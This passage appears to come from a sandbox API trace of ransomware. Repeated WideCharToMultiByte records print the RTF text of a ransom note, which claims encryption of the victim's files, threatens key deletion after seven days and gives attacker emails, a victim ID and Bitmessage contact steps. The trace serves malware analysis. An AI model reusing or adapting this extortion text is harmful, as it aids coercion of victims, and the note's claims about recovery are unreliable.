ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.361] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.361] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 